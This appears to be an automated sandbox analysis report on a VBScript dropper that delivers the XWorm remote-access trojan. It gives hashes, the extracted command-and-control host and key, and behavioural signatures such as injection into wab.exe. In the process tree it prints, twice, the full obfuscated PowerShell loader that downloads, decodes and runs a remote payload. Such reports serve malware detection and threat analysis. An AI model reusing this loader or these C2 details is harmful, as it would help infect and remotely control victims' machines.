Analysis
-
max time kernel
150s -
max time network
143s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
24-05-2024 13:13
Static task
static1
Behavioral task
behavioral1
Sample
b8ac41b4cb337b5d1c12345f1cfbf125efeaafb14f7bdbac85717a358ed2a1d1.vbs
Resource
win7-20240221-en
General
-
Target
b8ac41b4cb337b5d1c12345f1cfbf125efeaafb14f7bdbac85717a358ed2a1d1.vbs
-
Size
896KB
-
MD5
a227043beb151087c1798b6f9aaabd4c
-
SHA1
b2c4537386ed7931d9df29719f11f0f019e0f43a
-
SHA256
b8ac41b4cb337b5d1c12345f1cfbf125efeaafb14f7bdbac85717a358ed2a1d1
-
SHA512
1031ce3bea154181078799db133f2a8e419f912d548b69bd21572707bd7a3cf2c44cc273b1f582a0edcae73523c2927c210c0917c758b92364d64977b2ca208e
-
SSDEEP
12288:qzTzUyR7hSRac+qkLmttaGgMskgqoiMHsp9p:UXh+k+taGKqoJOp
Malware Config
Extracted
xworm
5.0
x5387400.duckdns.org:8896
F4ssR8b386Bj6q2g
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1548-91-0x0000000000DA0000-0x0000000000DB0000-memory.dmp family_xworm -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 5 3044 powershell.exe 7 3044 powershell.exe 9 3044 powershell.exe 11 3044 powershell.exe 13 3044 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 1548 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2920 powershell.exe 1548 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2920 set thread context of 1548 2920 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 3044 powershell.exe 2920 powershell.exe 2920 powershell.exe 1548 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2920 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 3044 powershell.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeDebugPrivilege 1548 wab.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
wab.exepid process 1548 wab.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 2188 wrote to memory of 3044 2188 WScript.exe powershell.exe PID 2188 wrote to memory of 3044 2188 WScript.exe powershell.exe PID 2188 wrote to memory of 3044 2188 WScript.exe powershell.exe PID 3044 wrote to memory of 2844 3044 powershell.exe cmd.exe PID 3044 wrote to memory of 2844 3044 powershell.exe cmd.exe PID 3044 wrote to memory of 2844 3044 powershell.exe cmd.exe PID 3044 wrote to memory of 2920 3044 powershell.exe powershell.exe PID 3044 wrote to memory of 2920 3044 powershell.exe powershell.exe PID 3044 wrote to memory of 2920 3044 powershell.exe powershell.exe PID 3044 wrote to memory of 2920 3044 powershell.exe powershell.exe PID 2920 wrote to memory of 2696 2920 powershell.exe cmd.exe PID 2920 wrote to memory of 2696 2920 powershell.exe cmd.exe PID 2920 wrote to memory of 2696 2920 powershell.exe cmd.exe PID 2920 wrote to memory of 2696 2920 powershell.exe cmd.exe PID 2920 wrote to memory of 1548 2920 powershell.exe wab.exe PID 2920 wrote to memory of 1548 2920 powershell.exe wab.exe PID 2920 wrote to memory of 1548 2920 powershell.exe wab.exe PID 2920 wrote to memory of 1548 2920 powershell.exe wab.exe PID 2920 wrote to memory of 1548 2920 powershell.exe wab.exe PID 2920 wrote to memory of 1548 2920 powershell.exe wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b8ac41b4cb337b5d1c12345f1cfbf125efeaafb14f7bdbac85717a358ed2a1d1.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$eksaminering = 1;$Panscientist='Sub';$Panscientist+='strin';$Panscientist+='g';Function Handspec($Televisionsnettenes){$Moralisation247=$Televisionsnettenes.Length-$eksaminering;For($Hdqrs=5;$Hdqrs -lt $Moralisation247;$Hdqrs+=6){$Junco+=$Televisionsnettenes.$Panscientist.Invoke( $Hdqrs, $eksaminering);}$Junco;}function Tramman($Hastener){& ($Cosmologies) ($Hastener);}$Fljlskjoler=Handspec ' OverMSqui.oSelinzga.opiVerselahslulUdlbsaCotil/N.umi5Fry t.Co.pa0Fordu Agnoi(thereWC.mpaiNay,rnMas edRegisoResliw aksesS,mek PinnaN KanaTFiber Jak e1 Dubb0Trekv.Pseud0Udsm.;.inis PrecoWScoloi For nbyrin6Sabba4 Port;Bille kurslx .phe6 Kree4Ro,nt;Aktie Burmer Da avDomin:Vildn1Bi,li2Domme1Immat.syd.o0Ureth)Goos SlyngGshipweLeucacSaturk KrypoGazel/Angst2U vlg0Slkke1 stt,0Distr0 Eume1jacko0Skinn1Al.ri AlwatFDobbei EksprDeveie Moraffl.skoIntrexResul/ Sten1Serie2Ps,ko1Perem.tranl0Mo,el ';$Querimonies=Handspec 'NuculU.rspas KunseKr,ktrKatho-HyperALinj gDelpreNew on TilltTilpa ';$Explorator=Handspec 'Sst,rhSpoketVans tParslpr.manswhees:Ggle /Vandf/ LaurwAnat,wAfholwGifti.DiollsSpongeChro.nArchid ForksUfattpEgonsaStr bcTebore Ny n.P pircmynheoPrecomSemic/MoralpUn larNoncooPrygl/.ensld GisalAftrd/ p,iveKnsbj7StikloSolilpDutchyBnlig8Prope ';$Forskningscenterets=Handspec 'Phro > Taro ';$Cosmologies=Handspec 'VicisiBarieeTudlix .ham ';$Overhair='Mottos';$Nonpros = Handspec 'KatteeSnubbcHyp,rhUnsh oHo,do Suppe%Poseka UdlipNyslvpDispodWo,gaaPernatTransastere%Skure\.ntheL ramdInvene NedgrJenvimSy.rpaNondecAnthrhLa ereGabbitS inntMakeseUdspinHydrosOopho.Toph K MetauMi,idr A,sa Outpr&Sigva& Expe Lar.eBar kc OverhPeriooEquic KromitM,nke ';Tramman (Handspec 'Begor$Beto gGladllRupisoUnswibChacoaChiselEtati:EksotPf.odse InteaForbrrS.ulkmOutsea.ensaiSouvenT.ppesKultu=trans(Kon,rcInte mGranddBouri Scrat/SupercSelme eluci$DebilNTaoisoFelttnDis tpMel,er HyleoSt pes Opri)Rumba ');Tramman (Handspec 'Zamb.$MisspgVinielKorkeoBluefbT,nikaSkygglQuod,:UdganpJacobu Borts ConitUnioneEndivn Boa dSporie UbemsFredf=Windo$Stre.EPostuxDolmep Wergl TjekoKomperAksgraKoll tHattioVarmerKonst.Nummus Fi.apKaff l,ociaiNosogtSrett( grat$ subpFBu eao Pyror.oojasAce ykRechanBostoiP,trun StjfgBulb sRealic,armpeM ensnRernetMsketeUdvikrFranceFadertchefpsMaioi)Triba ');$Explorator=$pustendes[0];$Bumblings= (Handspec 'Manus$SgeregCirc.lBlytaoSknhebGstelaVrdillAkse :DisplFSidepaMo ifrBy,tevAfibreSpurvlS.ackl kkileZoolotSubsk=ClareNBejleeSchiswgifti-RecubON ninbFremfj AfsleGeadec Ge lt Gira MeldrSBytt yMonersVidertEksile KapimCir.i.,iquaN Com.eOpregt.ross.LyknsWSy,paeUnco,b,fsnrCUndislGlau.iWr,biePlastnTamist');$Bumblings+=$Pearmains[1];Tramman ($Bumblings);Tramman (Handspec ' tikm$S,ampFThoriaReechr R.devSup,eeUnulclItonilSoapfe U,clt.ungu. IsraHStandex.verauncred Bh geo.acor ,rkmsSplat[Napal$ PhotQT ahou In,peSp.rirIntraiShabbmAlbumo FolknGo.sai,nname AutosGang ]Datal=Dinar$klargFsade,l emijKbesulBran,sWindok FabrjUndeso.ecuplGadabeLipogrNinia ');$Uformuenheds=Handspec 'buffo$Kre.tFZitasaB tchrD ktov Nephe,epsblParablKrimieNo.attSofte.OversDCallooH,lebwB,sidnDek,tlJo,efoVerdia hyssd DietFIvywoiOrddelSljdle Curi(Hanke$ OverE Pl uxt issp KontlDdbi.oChr,srMenueaModtatPilloo Cri rafbre,Ele t$ ekstCB belyCirkuk,ylogeAf etlGastrtDishau,eputrStorhsFremf)Baldp ';$Cykelturs=$Pearmains[0];Tramman (Handspec ' Spyd$Kreerg .ipelCar oo.empebMusk.aindh.lmi,sp:SmlenMMusl.eDiphyrDilutiNondidFejlki s.eca Ent nLa ereStvlerDend.n monoeUnionsMelle=F rtt(Ma.dsTKrse,eNymphs AdaptBagpa- BagbP JeriaLargetBeatmhHib,r Ndigs$ PartCT ucuyTutork En,eeFortrlDobbetGaranuOffenrShechsRe ul)Forbi ');while (!$Meridianernes) {Tramman (Handspec 'Aflej$UdbedgTr.nslSculkoJubilbAf.taa,edthlNonun: opliKTrafio.oskulSkriflOverge KombgSurviiRefraeBi.chvhpar rMyxe,estalel Bests S amePapertColops Jets=Couch$ xacttfrtidrKonseuCreweeLutri ') ;Tramman $Uformuenheds;Tramman (Handspec 'vejrmSUnspot orlsaBk,enrNonsetMonti-UdlndSElertl Sa.eeTavshe pro ptimia Ophth4Quil ');Tramman (Handspec 'Brita$We sdgSennilJ,beroKugedb Sub.aAnvenl,ereg:imporMCephae HybrrDure iGradmdN.mmeifruesa .kamnpainteFoliar.ilianAn,aceB sils prek=Hyp.i(B,werTDaim e klipsBevbntSpr,n-Di hpPClar.aSansetForlah Musc Eve,n$Ind,mCMaaneyW.llckSkakkequirkl SphetManipunondirCartosHall )Rr,gg ') ;Tramman (Handspec 'Hobbi$Bredeg S.lll afskoS onebFaktua Fhovl Pneu:.efamB Vandr KwannV.caleNarkolUnmeegnoesieAer,mrberoes Skar=Debit$Sim ag.emifl In.uo orlibAnt,laa skelklane:.elehB Dursr.tvbrePrewecMessecLittei Skova Yoket Mutue.dste+ Su r+De.as%Nonsh$MillipLoev,uLeje s Bru tOpeneesputen P ntdTelepeboligsEnerg.Handycmetr.o PostuUnbianFavortUnwhi ') ;$Explorator=$pustendes[$Brnelgers];}$Gymnogenous=317537;$Stopfodring=29102;Tramman (Handspec 'Rizzo$KonfegLkkeslHalvpoDyb abResheaAa,enlneure: sho,NIndv e ArbecModsteTidinsk biks SpinikuldetPresoaDdsserRes liVenisa OprunForvei Sym.sPostdmRhamn Bund= Opsl cryobG.aponeintertTung -PreinCUnquio SammnCa,olt ,jlpeSyretn BloktDi,tr nio$AntikC BedryplankkMidcaeOnychlHingstOutw,uCringr K,ydsAal.o ');Tramman (Handspec 'Anapt$radiogElectl FjoloSvrvgbdingla.terllUnpra: ournSTrillt estei ForegPlanabHy.obo BrnerCarredsuper Spra,=Ulcer Tu,is[DiploSSpaltyFondssGysert B.mmeHabi.mFange.K rakCKni mo Kystn Ver v AfspeUpaakrNougatInter]Fomi,:pierc:EridaFopinirVaso.o ,ausm ReliB Wan,aOverhsThreaeSt,ll6 .esk4,ressSPhototLad orUdraai No,anBevisgBloka(e,tra$an elNI,buseUbestcScripe Tilss C,risClam iHovedtFittiaTetrarUnproiindisa arlinHaggaiSchems Dog m,irku)Sukke ');Tramman (Handspec ' Cens$Tandsg RelelVant oSfartbNonpua yprlHensy:Mi.deKUn,uiuIntrompresceAdsminFragmi ntrek Te.nkm rroe Ba.gnUndersSaccu U.ha=igloe .onc[Pt.alSbelsiyTallysKaemptFrem ePoulamSte,e.da seTHypodeDestix etost Psy . Ce,iEUdb.tnEquidcPretio BrugdInt aiAttranWittigKwela]Jvnfr:Samme:IrritA.ilitS LevaC UncaI.oligIShirt. inyG valgeKortstMissiSAvi.st Gen,r .raniGtcp,nBugv.g,ades(Pil.r$EtnolS U cot Illuidagshg tychbVolcao FletrCommodOpels) Aa,u ');Tramman (Handspec ' Marg$EpoxygSkydelKreeroFormkbAnvenaDeroglIndko:ScrubFSt,rse Eu rmDipp oMamalgAgerdt Aec.yGlittvGasrae UncoaAutalaSkolor ReadsBanem2 Oven4 ulso=Nonfi$ B ssKSyntauByggemLimiteMor.enreminiBleatkElytrkUn cceSoli.nba twsFod.u.Ko,tvsS.redu,dsteb TequsFa vet NarirPeritiE stenVandrgSt rs(Flage$SuperG de.mySexetm Da.inStyrtoDandrgHeltae rednI.teroWordluOcellsGrave, prud$mulieS P,lpt F,rsoForskpOwherfAfdrao paupdGastrrPensaiBu.shnHe itgI sol)Wa er ');Tramman $Femogtyveaars24;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ldermachettens.Kur && echo t"3⤵PID:2844
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$eksaminering = 1;$Panscientist='Sub';$Panscientist+='strin';$Panscientist+='g';Function Handspec($Televisionsnettenes){$Moralisation247=$Televisionsnettenes.Length-$eksaminering;For($Hdqrs=5;$Hdqrs -lt $Moralisation247;$Hdqrs+=6){$Junco+=$Televisionsnettenes.$Panscientist.Invoke( $Hdqrs, $eksaminering);}$Junco;}function Tramman($Hastener){& ($Cosmologies) ($Hastener);}$Fljlskjoler=Handspec ' OverMSqui.oSelinzga.opiVerselahslulUdlbsaCotil/N.umi5Fry t.Co.pa0Fordu Agnoi(thereWC.mpaiNay,rnMas edRegisoResliw aksesS,mek PinnaN KanaTFiber Jak e1 Dubb0Trekv.Pseud0Udsm.;.inis PrecoWScoloi For nbyrin6Sabba4 Port;Bille kurslx .phe6 Kree4Ro,nt;Aktie Burmer Da avDomin:Vildn1Bi,li2Domme1Immat.syd.o0Ureth)Goos SlyngGshipweLeucacSaturk KrypoGazel/Angst2U vlg0Slkke1 stt,0Distr0 Eume1jacko0Skinn1Al.ri AlwatFDobbei EksprDeveie Moraffl.skoIntrexResul/ Sten1Serie2Ps,ko1Perem.tranl0Mo,el ';$Querimonies=Handspec 'NuculU.rspas KunseKr,ktrKatho-HyperALinj gDelpreNew on TilltTilpa ';$Explorator=Handspec 'Sst,rhSpoketVans tParslpr.manswhees:Ggle /Vandf/ LaurwAnat,wAfholwGifti.DiollsSpongeChro.nArchid ForksUfattpEgonsaStr bcTebore Ny n.P pircmynheoPrecomSemic/MoralpUn larNoncooPrygl/.ensld GisalAftrd/ p,iveKnsbj7StikloSolilpDutchyBnlig8Prope ';$Forskningscenterets=Handspec 'Phro > Taro ';$Cosmologies=Handspec 'VicisiBarieeTudlix .ham ';$Overhair='Mottos';$Nonpros = Handspec 'KatteeSnubbcHyp,rhUnsh oHo,do Suppe%Poseka UdlipNyslvpDispodWo,gaaPernatTransastere%Skure\.ntheL ramdInvene NedgrJenvimSy.rpaNondecAnthrhLa ereGabbitS inntMakeseUdspinHydrosOopho.Toph K MetauMi,idr A,sa Outpr&Sigva& Expe Lar.eBar kc OverhPeriooEquic KromitM,nke ';Tramman (Handspec 'Begor$Beto gGladllRupisoUnswibChacoaChiselEtati:EksotPf.odse InteaForbrrS.ulkmOutsea.ensaiSouvenT.ppesKultu=trans(Kon,rcInte mGranddBouri Scrat/SupercSelme eluci$DebilNTaoisoFelttnDis tpMel,er HyleoSt pes Opri)Rumba ');Tramman (Handspec 'Zamb.$MisspgVinielKorkeoBluefbT,nikaSkygglQuod,:UdganpJacobu Borts ConitUnioneEndivn Boa dSporie UbemsFredf=Windo$Stre.EPostuxDolmep Wergl TjekoKomperAksgraKoll tHattioVarmerKonst.Nummus Fi.apKaff l,ociaiNosogtSrett( grat$ subpFBu eao Pyror.oojasAce ykRechanBostoiP,trun StjfgBulb sRealic,armpeM ensnRernetMsketeUdvikrFranceFadertchefpsMaioi)Triba ');$Explorator=$pustendes[0];$Bumblings= (Handspec 'Manus$SgeregCirc.lBlytaoSknhebGstelaVrdillAkse :DisplFSidepaMo ifrBy,tevAfibreSpurvlS.ackl kkileZoolotSubsk=ClareNBejleeSchiswgifti-RecubON ninbFremfj AfsleGeadec Ge lt Gira MeldrSBytt yMonersVidertEksile KapimCir.i.,iquaN Com.eOpregt.ross.LyknsWSy,paeUnco,b,fsnrCUndislGlau.iWr,biePlastnTamist');$Bumblings+=$Pearmains[1];Tramman ($Bumblings);Tramman (Handspec ' tikm$S,ampFThoriaReechr R.devSup,eeUnulclItonilSoapfe U,clt.ungu. IsraHStandex.verauncred Bh geo.acor ,rkmsSplat[Napal$ PhotQT ahou In,peSp.rirIntraiShabbmAlbumo FolknGo.sai,nname AutosGang ]Datal=Dinar$klargFsade,l emijKbesulBran,sWindok FabrjUndeso.ecuplGadabeLipogrNinia ');$Uformuenheds=Handspec 'buffo$Kre.tFZitasaB tchrD ktov Nephe,epsblParablKrimieNo.attSofte.OversDCallooH,lebwB,sidnDek,tlJo,efoVerdia hyssd DietFIvywoiOrddelSljdle Curi(Hanke$ OverE Pl uxt issp KontlDdbi.oChr,srMenueaModtatPilloo Cri rafbre,Ele t$ ekstCB belyCirkuk,ylogeAf etlGastrtDishau,eputrStorhsFremf)Baldp ';$Cykelturs=$Pearmains[0];Tramman (Handspec ' Spyd$Kreerg .ipelCar oo.empebMusk.aindh.lmi,sp:SmlenMMusl.eDiphyrDilutiNondidFejlki s.eca Ent nLa ereStvlerDend.n monoeUnionsMelle=F rtt(Ma.dsTKrse,eNymphs AdaptBagpa- BagbP JeriaLargetBeatmhHib,r Ndigs$ PartCT ucuyTutork En,eeFortrlDobbetGaranuOffenrShechsRe ul)Forbi ');while (!$Meridianernes) {Tramman (Handspec 'Aflej$UdbedgTr.nslSculkoJubilbAf.taa,edthlNonun: opliKTrafio.oskulSkriflOverge KombgSurviiRefraeBi.chvhpar rMyxe,estalel Bests S amePapertColops Jets=Couch$ xacttfrtidrKonseuCreweeLutri ') ;Tramman $Uformuenheds;Tramman (Handspec 'vejrmSUnspot orlsaBk,enrNonsetMonti-UdlndSElertl Sa.eeTavshe pro ptimia Ophth4Quil ');Tramman (Handspec 'Brita$We sdgSennilJ,beroKugedb Sub.aAnvenl,ereg:imporMCephae HybrrDure iGradmdN.mmeifruesa .kamnpainteFoliar.ilianAn,aceB sils prek=Hyp.i(B,werTDaim e klipsBevbntSpr,n-Di hpPClar.aSansetForlah Musc Eve,n$Ind,mCMaaneyW.llckSkakkequirkl SphetManipunondirCartosHall )Rr,gg ') ;Tramman (Handspec 'Hobbi$Bredeg S.lll afskoS onebFaktua Fhovl Pneu:.efamB Vandr KwannV.caleNarkolUnmeegnoesieAer,mrberoes Skar=Debit$Sim ag.emifl In.uo orlibAnt,laa skelklane:.elehB Dursr.tvbrePrewecMessecLittei Skova Yoket Mutue.dste+ Su r+De.as%Nonsh$MillipLoev,uLeje s Bru tOpeneesputen P ntdTelepeboligsEnerg.Handycmetr.o PostuUnbianFavortUnwhi ') ;$Explorator=$pustendes[$Brnelgers];}$Gymnogenous=317537;$Stopfodring=29102;Tramman (Handspec 'Rizzo$KonfegLkkeslHalvpoDyb abResheaAa,enlneure: sho,NIndv e ArbecModsteTidinsk biks SpinikuldetPresoaDdsserRes liVenisa OprunForvei Sym.sPostdmRhamn Bund= Opsl cryobG.aponeintertTung -PreinCUnquio SammnCa,olt ,jlpeSyretn BloktDi,tr nio$AntikC BedryplankkMidcaeOnychlHingstOutw,uCringr K,ydsAal.o ');Tramman (Handspec 'Anapt$radiogElectl FjoloSvrvgbdingla.terllUnpra: ournSTrillt estei ForegPlanabHy.obo BrnerCarredsuper Spra,=Ulcer Tu,is[DiploSSpaltyFondssGysert B.mmeHabi.mFange.K rakCKni mo Kystn Ver v AfspeUpaakrNougatInter]Fomi,:pierc:EridaFopinirVaso.o ,ausm ReliB Wan,aOverhsThreaeSt,ll6 .esk4,ressSPhototLad orUdraai No,anBevisgBloka(e,tra$an elNI,buseUbestcScripe Tilss C,risClam iHovedtFittiaTetrarUnproiindisa arlinHaggaiSchems Dog m,irku)Sukke ');Tramman (Handspec ' Cens$Tandsg RelelVant oSfartbNonpua yprlHensy:Mi.deKUn,uiuIntrompresceAdsminFragmi ntrek Te.nkm rroe Ba.gnUndersSaccu U.ha=igloe .onc[Pt.alSbelsiyTallysKaemptFrem ePoulamSte,e.da seTHypodeDestix etost Psy . Ce,iEUdb.tnEquidcPretio BrugdInt aiAttranWittigKwela]Jvnfr:Samme:IrritA.ilitS LevaC UncaI.oligIShirt. inyG valgeKortstMissiSAvi.st Gen,r .raniGtcp,nBugv.g,ades(Pil.r$EtnolS U cot Illuidagshg tychbVolcao FletrCommodOpels) Aa,u ');Tramman (Handspec ' Marg$EpoxygSkydelKreeroFormkbAnvenaDeroglIndko:ScrubFSt,rse Eu rmDipp oMamalgAgerdt Aec.yGlittvGasrae UncoaAutalaSkolor ReadsBanem2 Oven4 ulso=Nonfi$ B ssKSyntauByggemLimiteMor.enreminiBleatkElytrkUn cceSoli.nba twsFod.u.Ko,tvsS.redu,dsteb TequsFa vet NarirPeritiE stenVandrgSt rs(Flage$SuperG de.mySexetm Da.inStyrtoDandrgHeltae rednI.teroWordluOcellsGrave, prud$mulieS P,lpt F,rsoForskpOwherfAfdrao paupdGastrrPensaiBu.shnHe itgI sol)Wa er ');Tramman $Femogtyveaars24;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ldermachettens.Kur && echo t"4⤵PID:2696
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1548
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD5132eb4e07b19255cfddd514836c820aa
SHA10b4a4c5c9f9c69f0d39e9022f21d741a606e3a87
SHA25686a6d4900e9f859110af67cc0796d104a17aca9a6939b59a24a2739a0c4ee713
SHA5121f232cc900ce47efb94edcbcb7975f2973bbbd3d1ad5bf62b4934a9d9d2dd686586a2edbe0f3c009237f6f6d111c3a6c36103fd4649d311604afc47e6ef1547b
-
C:\Users\Admin\AppData\Local\Temp\Tar65DC.tmpFilesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
C:\Users\Admin\AppData\Roaming\Ldermachettens.KurFilesize
451KB
MD5025a6247195641a554ded5d68762070f
SHA16a3e9a2bc4f57a8d63c2a860e7aa7069ddb5a0b5
SHA256672dfc440d33e5cc5c8dc760df125ac4869e6bd412c97008738c3a9e9e16d9fb
SHA51267333f46fdcf2b94aba54f273a5c9d06ef4ce6b9e3702b3925a8dfb56d0c2653b419015acdd54cbf6620e53d86d962dec5403215c1ad23d7891c492c4c971bdc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IZ0508IEBI9WEI0ES0ZR.tempFilesize
7KB
MD5261ebbbea8ead4e711fd2fe5ec408ced
SHA1863295b2e8af416ece01326d4170c6a2b8f138d6
SHA2562fd7a86081743b9cba177897361676388129fc6a6494985fb3df229bc1d1879c
SHA51254f6182afc9f425be57540ba0a16fdee4081bfd1779beb9a649e27fcef348bfc764fe8ddb6bc4310cb97243556b637d20237747354e474b6c0b32b07e1840261
-
memory/1548-91-0x0000000000DA0000-0x0000000000DB0000-memory.dmpFilesize
64KB
-
memory/1548-88-0x0000000000DA0000-0x0000000001E02000-memory.dmpFilesize
16.4MB
-
memory/2920-59-0x00000000064A0000-0x000000000A3CA000-memory.dmpFilesize
63.2MB
-
memory/3044-11-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmpFilesize
9.6MB
-
memory/3044-8-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmpFilesize
9.6MB
-
memory/3044-9-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmpFilesize
9.6MB
-
memory/3044-10-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmpFilesize
9.6MB
-
memory/3044-58-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmpFilesize
9.6MB
-
memory/3044-4-0x000007FEF61AE000-0x000007FEF61AF000-memory.dmpFilesize
4KB
-
memory/3044-60-0x000007FEF61AE000-0x000007FEF61AF000-memory.dmpFilesize
4KB
-
memory/3044-7-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmpFilesize
9.6MB
-
memory/3044-6-0x0000000001FC0000-0x0000000001FC8000-memory.dmpFilesize
32KB
-
memory/3044-90-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmpFilesize
9.6MB
-
memory/3044-5-0x000000001B7D0000-0x000000001BAB2000-memory.dmpFilesize
2.9MB